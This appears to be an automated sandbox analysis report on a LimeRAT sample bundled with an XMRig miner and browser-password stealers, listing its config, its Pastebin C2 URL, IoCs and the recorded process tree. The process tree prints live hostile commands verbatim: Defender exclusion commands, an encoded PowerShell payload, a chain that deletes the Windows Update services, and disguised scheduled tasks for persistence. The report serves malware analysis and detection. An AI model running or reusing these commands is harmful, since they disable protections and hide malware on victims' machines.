limerat | d0fd88199448558df5b8c56936e822aea87f9149c23682004edbf36f28bfb78e

Analysis

max time kernel
78s
max time network
112s
platform
windows7_x64
resource
win7-20220414-en
submitted
06-05-2022 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b1a6bd454f8e723bd8f1b856b336c844.exe
Size

13.4MB
MD5

b1a6bd454f8e723bd8f1b856b336c844
SHA1

e50b78534ab2761b9f654333f81be3a60f736eb9
SHA256

d0fd88199448558df5b8c56936e822aea87f9149c23682004edbf36f28bfb78e
SHA512

2bff70684886914c8affa398dda0f801dc22d8f7d0a2a4f2578378f387744c6548779fd2065c7ddde3757d4c3786c40b6006aa1a371ea0b0c1a0ef425ecccd80

Score

10^/10

limerat xmrig discovery evasion exploit miner rat spyware stealer upx vmprotect

Malware Config

Extracted

Family

limerat

Attributes

aes_key
1234
antivm
true
c2_url
https://pastebin.com/raw/nFP8Nq0E
delay
3
download_payload
false
install
true
install_name
whitelistcheck.exe
main_folder
AppData
pin_spread
false
sub_folder
\
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1664 created 420 1664 powershell.EXE winlogon.exe
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

description	pid	process	target process
PID 1664 created 420	1664	powershell.EXE	winlogon.exe

NirSoft WebBrowserPassView 12 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\n.exe	WebBrowserPassView
\Users\Admin\AppData\Local\Temp\n.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\n.exe	WebBrowserPassView
behavioral1/memory/1708-83-0x0000000000890000-0x0000000000D2C000-memory.dmp	WebBrowserPassView
\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	WebBrowserPassView
behavioral1/memory/1604-102-0x0000000000A80000-0x0000000000EFA000-memory.dmp	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView
\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView
\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView

Nirsoft 17 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\n.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\n.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\n.exe	Nirsoft
behavioral1/memory/1708-83-0x0000000000890000-0x0000000000D2C000-memory.dmp	Nirsoft
behavioral1/memory/1800-96-0x0000000001EC0000-0x0000000001F40000-memory.dmp	Nirsoft
\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	Nirsoft
behavioral1/memory/1604-102-0x0000000000A80000-0x0000000000EFA000-memory.dmp	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/436-336-0x0000000140000000-0x0000000140802000-memory.dmp	xmrig

Drops file in Drivers directory 1 IoCs

Processes:

conhost.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe
Executes dropped EXE 8 IoCs

Processes:

protected.exeNew-Client-Test.exen.exemenu.exeRtkBtManServ.exewhitelistcheck.exeupdater.exesnuvcdsm.exe

pid process

1960 protected.exe
1128 New-Client-Test.exe
1708 n.exe
1804 menu.exe
1604 RtkBtManServ.exe
568 whitelistcheck.exe
1644 updater.exe
1996 snuvcdsm.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1104 takeown.exe
1296 icacls.exe
1952 takeown.exe
1648 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

pid	process
1960	protected.exe
1128	New-Client-Test.exe
1708	n.exe
1804	menu.exe
1604	RtkBtManServ.exe
568	whitelistcheck.exe
1644	updater.exe
1996	snuvcdsm.exe

pid	process
1104	takeown.exe
1296	icacls.exe
1952	takeown.exe
1648	icacls.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\splwow64.exe	upx
C:\Users\Admin\AppData\Local\Temp\splwow64.exe	upx
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
C:\Users\Admin\AppData\Local\Temp\splwow64.exe	upx
\Users\Admin\AppData\Local\Temp\splwow64.exe	upx

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/memory/376-54-0x0000000000400000-0x0000000001D56000-memory.dmp	vmprotect
behavioral1/memory/376-75-0x0000000000400000-0x0000000001D56000-memory.dmp	vmprotect

Loads dropped DLL 12 IoCs

Processes:

cmd.execmd.execmd.execmd.exen.exeNew-Client-Test.execmd.exeDllHost.exe

pid	process
956	cmd.exe
1728	cmd.exe
956	cmd.exe
1348	cmd.exe
1780	cmd.exe
1780	cmd.exe
1708	n.exe
1128	New-Client-Test.exe
1128	New-Client-Test.exe
1368	cmd.exe
1520	DllHost.exe
1520	DllHost.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1952 takeown.exe
1648 icacls.exe
1104 takeown.exe
1296 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ipecho.net
5 ipecho.net

pid	process
1952	takeown.exe
1648	icacls.exe
1104	takeown.exe
1296	icacls.exe

flow	ioc
4	ipecho.net
5	ipecho.net

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

b1a6bd454f8e723bd8f1b856b336c844.exe

pid process

376 b1a6bd454f8e723bd8f1b856b336c844.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

conhost.exepowershell.EXE

description	pid	process	target process
PID 1992 set thread context of 1020	1992	conhost.exe	conhost.exe
PID 1664 set thread context of 1688	1664	powershell.EXE	dllhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1904 schtasks.exe
1368 schtasks.exe

pid	process
1904	schtasks.exe
1368	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

lsass.exepowershell.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 506e1a052861d801	powershell.EXE

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1072	reg.exe
1760	reg.exe
1216	reg.exe
1184	reg.exe
1448	reg.exe
1528	reg.exe
1620	reg.exe
276	reg.exe
1300	reg.exe
1504	reg.exe
864	reg.exe
1876	reg.exe
1248	reg.exe
2044	reg.exe
952	reg.exe
1876	reg.exe
1488	reg.exe
1816	reg.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

b1a6bd454f8e723bd8f1b856b336c844.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.EXEpowershell.EXEdllhost.exepowershell.exe

pid	process
376	b1a6bd454f8e723bd8f1b856b336c844.exe
1300	powershell.exe
1800	powershell.exe
1164	powershell.exe
1992	conhost.exe
1644	powershell.EXE
1664	powershell.EXE
1664	powershell.EXE
1688	dllhost.exe
1688	dllhost.exe
1688	dllhost.exe
1688	dllhost.exe
1636	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeRtkBtManServ.execonhost.exepowershell.EXEpowershell.EXEdllhost.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeShutdownPrivilege	1072	powercfg.exe
Token: SeShutdownPrivilege	1644	powercfg.exe
Token: SeShutdownPrivilege	1748	powercfg.exe
Token: SeShutdownPrivilege	772	powercfg.exe
Token: SeTakeOwnershipPrivilege	1952	takeown.exe
Token: SeDebugPrivilege	1604	RtkBtManServ.exe
Token: SeDebugPrivilege	1992	conhost.exe
Token: SeDebugPrivilege	1644	powershell.EXE
Token: SeDebugPrivilege	1664	powershell.EXE
Token: SeDebugPrivilege	1664	powershell.EXE
Token: SeDebugPrivilege	1688	dllhost.exe
Token: SeDebugPrivilege	1636	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b1a6bd454f8e723bd8f1b856b336c844.execmd.execmd.execmd.execmd.execmd.exeprotected.exemenu.execmd.execmd.execonhost.execmd.exen.exe

description	pid	process	target process
PID 376 wrote to memory of 1968	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1968	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1968	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1968	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 956	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 956	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 956	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 956	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1728	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1728	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1728	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1728	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 1968 wrote to memory of 1300	1968	cmd.exe	powershell.exe
PID 1968 wrote to memory of 1300	1968	cmd.exe	powershell.exe
PID 1968 wrote to memory of 1300	1968	cmd.exe	powershell.exe
PID 1968 wrote to memory of 1300	1968	cmd.exe	powershell.exe
PID 376 wrote to memory of 1348	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1348	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1348	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1348	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1780	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1780	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1780	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 376 wrote to memory of 1780	376	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 1728 wrote to memory of 1960	1728	cmd.exe	protected.exe
PID 1728 wrote to memory of 1960	1728	cmd.exe	protected.exe
PID 1728 wrote to memory of 1960	1728	cmd.exe	protected.exe
PID 1728 wrote to memory of 1960	1728	cmd.exe	protected.exe
PID 956 wrote to memory of 1128	956	cmd.exe	New-Client-Test.exe
PID 956 wrote to memory of 1128	956	cmd.exe	New-Client-Test.exe
PID 956 wrote to memory of 1128	956	cmd.exe	New-Client-Test.exe
PID 956 wrote to memory of 1128	956	cmd.exe	New-Client-Test.exe
PID 1348 wrote to memory of 1708	1348	cmd.exe	n.exe
PID 1348 wrote to memory of 1708	1348	cmd.exe	n.exe
PID 1348 wrote to memory of 1708	1348	cmd.exe	n.exe
PID 1348 wrote to memory of 1708	1348	cmd.exe	n.exe
PID 1780 wrote to memory of 1804	1780	cmd.exe	menu.exe
PID 1780 wrote to memory of 1804	1780	cmd.exe	menu.exe
PID 1780 wrote to memory of 1804	1780	cmd.exe	menu.exe
PID 1780 wrote to memory of 1804	1780	cmd.exe	menu.exe
PID 1960 wrote to memory of 1992	1960	protected.exe	conhost.exe
PID 1960 wrote to memory of 1992	1960	protected.exe	conhost.exe
PID 1960 wrote to memory of 1992	1960	protected.exe	conhost.exe
PID 1960 wrote to memory of 1992	1960	protected.exe	conhost.exe
PID 1804 wrote to memory of 1976	1804	menu.exe	cmd.exe
PID 1804 wrote to memory of 1976	1804	menu.exe	cmd.exe
PID 1804 wrote to memory of 1976	1804	menu.exe	cmd.exe
PID 1804 wrote to memory of 1976	1804	menu.exe	cmd.exe
PID 1976 wrote to memory of 864	1976	cmd.exe	cmd.exe
PID 1976 wrote to memory of 864	1976	cmd.exe	cmd.exe
PID 1976 wrote to memory of 864	1976	cmd.exe	cmd.exe
PID 864 wrote to memory of 1724	864	cmd.exe	findstr.exe
PID 864 wrote to memory of 1724	864	cmd.exe	findstr.exe
PID 864 wrote to memory of 1724	864	cmd.exe	findstr.exe
PID 1992 wrote to memory of 1844	1992	conhost.exe	cmd.exe
PID 1992 wrote to memory of 1844	1992	conhost.exe	cmd.exe
PID 1992 wrote to memory of 1844	1992	conhost.exe	cmd.exe
PID 1844 wrote to memory of 1800	1844	cmd.exe	powershell.exe
PID 1844 wrote to memory of 1800	1844	cmd.exe	powershell.exe
PID 1844 wrote to memory of 1800	1844	cmd.exe	powershell.exe
PID 1708 wrote to memory of 1604	1708	n.exe	RtkBtManServ.exe
PID 1708 wrote to memory of 1604	1708	n.exe	RtkBtManServ.exe
PID 1708 wrote to memory of 1604	1708	n.exe	RtkBtManServ.exe
PID 1708 wrote to memory of 1604	1708	n.exe	RtkBtManServ.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Modifies data under HKEY_USERS
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{38dc42ce-7826-4be5-b192-eca06b3fe319}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Users\Admin\AppData\Local\Temp\b1a6bd454f8e723bd8f1b856b336c844.exe
"C:\Users\Admin\AppData\Local\Temp\b1a6bd454f8e723bd8f1b856b336c844.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:376

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:956

C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe
"C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1128

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\whitelistcheck.exe'"
4⤵
- Creates scheduled task(s)
PID:1368

C:\Users\Admin\AppData\Roaming\whitelistcheck.exe
"C:\Users\Admin\AppData\Roaming\whitelistcheck.exe"
4⤵
- Executes dropped EXE
PID:568

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\protected.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1728

C:\Users\Admin\AppData\Local\Temp\protected.exe
"C:\Users\Admin\AppData\Local\Temp\protected.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\protected.exe"
4⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHYAcQBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcAB0AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQB0AGkAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvAGMAdgAjAD4A"
5⤵
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHYAcQBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcAB0AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQB0AGkAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvAGMAdgAjAD4A"
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1888

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
PID:1904

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
PID:1756

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
PID:1608

C:\Windows\system32\sc.exe
sc stop bits
6⤵
PID:1664

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
PID:1676

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:1448

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:952

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:1300

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1528

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:1876

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1648

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1072

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1488

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1816

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1760

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:964

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:1008

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:952

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:1560

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:524

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:336

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:1384

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:772

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
5⤵
- Drops file in Windows directory
PID:1020

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
PID:1724

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
6⤵
- Creates scheduled task(s)
PID:1904

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
- Loads dropped DLL
PID:1368

C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
6⤵
- Executes dropped EXE
PID:1644

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
7⤵
PID:376

C:\Windows\System32\cmd.exe
